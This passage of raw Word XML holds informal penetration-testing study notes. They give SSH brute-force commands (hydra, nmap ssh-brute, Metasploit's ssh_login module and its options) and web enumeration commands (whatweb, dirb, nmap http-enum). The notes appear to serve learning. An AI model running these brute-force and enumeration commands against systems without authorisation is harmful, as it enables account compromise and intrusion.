          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“hydra -l (USER) -P (PASS_FILE) (HOST) ssh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746ABE4C" w14:textId="69002F56" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 22 –script ssh-brute –script-args userdb=(PASS_FILE)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1FC10" w14:textId="6E9C7FAA" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00E161BA" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit also has a module for this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F2E88" w14:textId="42D53A4E" w:rsidR="00E161BA" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/ssh/ssh_login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2F053" w14:textId="5B6BC26B" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00E161BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will brute force the SSH login</w:t>
      </w:r>
      <w:r w:rsidR="00184676" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEBCE6C" w14:textId="106DC286" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Some important options for this module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387C666" w14:textId="7392A25D" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set USERPASS_FILE – Much simpler than individually setting user/pass</w:t>
      </w:r>
      <w:r w:rsidR="00184676" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44235F" w14:textId="2F9BF3D3" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set STOP_ON_SUCCESS = true – You get the idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9C585" w14:textId="294EC8D4" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set VERBOSE = true – Visual output on each tried user/pass on the CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4620A" w14:textId="531BFBAB" w:rsidR="00662975" w:rsidRPr="002A77BD" w:rsidRDefault="00662975" w:rsidP="00662975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This is a MAD slow module Chief</w:t>
      </w:r>
      <w:r w:rsidR="00184676" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E63D4" w14:textId="77777777" w:rsidR="0039053B" w:rsidRPr="002A77BD" w:rsidRDefault="0039053B" w:rsidP="0039053B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150E8A0A" w14:textId="534CA1B9" w:rsidR="0039053B" w:rsidRPr="002A77BD" w:rsidRDefault="0039053B" w:rsidP="0039053B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP – Hypertext Transfer Protocol – IIS (THE INTERNET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F144F0" w14:textId="77777777" w:rsidR="0039053B" w:rsidRPr="002A77BD" w:rsidRDefault="0039053B" w:rsidP="0039053B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C7BD4C" w14:textId="5C7FEBAC" w:rsidR="0039053B" w:rsidRPr="002A77BD" w:rsidRDefault="0039053B" w:rsidP="0039053B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There is ALWAYS a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC40E53" w14:textId="6D4A368F" w:rsidR="0039053B" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="0039053B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Always go to the website on a web browser if port 80 is open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B19746" w14:textId="682EFA6E" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could help enumerate the website!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C893AF0" w14:textId="77777777" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6AA448" w14:textId="45A2A0E9" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WhatWeb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219F854" w14:textId="0F463013" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“whatweb (IP/DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138A583" w14:textId="258B1B6F" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Seems to enumerate the web server based on some of its services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC60B1" w14:textId="4B661046" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could also enumerate if there are potential web attack vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF92FE" w14:textId="77777777" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF0E27E" w14:textId="284ADF05" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTPie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3DC0B8" w14:textId="327F1E7E" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“http (IP/DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615674C" w14:textId="3566ED45" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View header info, server info, cookies, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C53765B" w14:textId="77777777" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78933A8A" w14:textId="3F3D2242" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1A70F" w14:textId="24412FC5" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://(IP/DOMAIN)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE3D8C" w14:textId="3659AEB7" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate potential directories on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323530ED" w14:textId="788DAE43" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilizes the common.txt wordlist, as specified in its output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEFD16F" w14:textId="05745012" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Gobuster is better, as it tells you status codes on its enumeration for each directory, meaning you can determine if that directory is accessible or not without having to manually access it on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209306C9" w14:textId="2FD7DFB4" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The only thing that potentially makes Dirb better is that it will continue to enumerate the directories that it finds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36404ECB" w14:textId="77777777" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493C9E7B" w14:textId="6A6A0F74" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Browsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77688DA6" w14:textId="713C0FE3" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerates graphical interface of the website, based on a URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53A113" w14:textId="28A329D8" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="00184676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Renders</w:t>
      </w:r>
      <w:r w:rsidR="00184676" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the interface straight </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00184676" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the CLI, although it looks like dogshit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D6C48" w14:textId="77777777" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401F5F9E" w14:textId="576C4F00" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP – NMAP Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381B93B" w14:textId="08FAC809" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 80 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http-enum”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BED0D" w14:textId="7D5253C4" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerates the services and potentially a few common directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E682B62" w14:textId="728073B1" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 80 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http-headers”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08897D83" w14:textId="7CBC2674" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Display headers of website, more and more enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAF97A" w14:textId="5AF3CFB8" w:rsidR="000E051D" w:rsidRPr="002A77BD" w:rsidRDefault="000E051D" w:rsidP="000E051D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
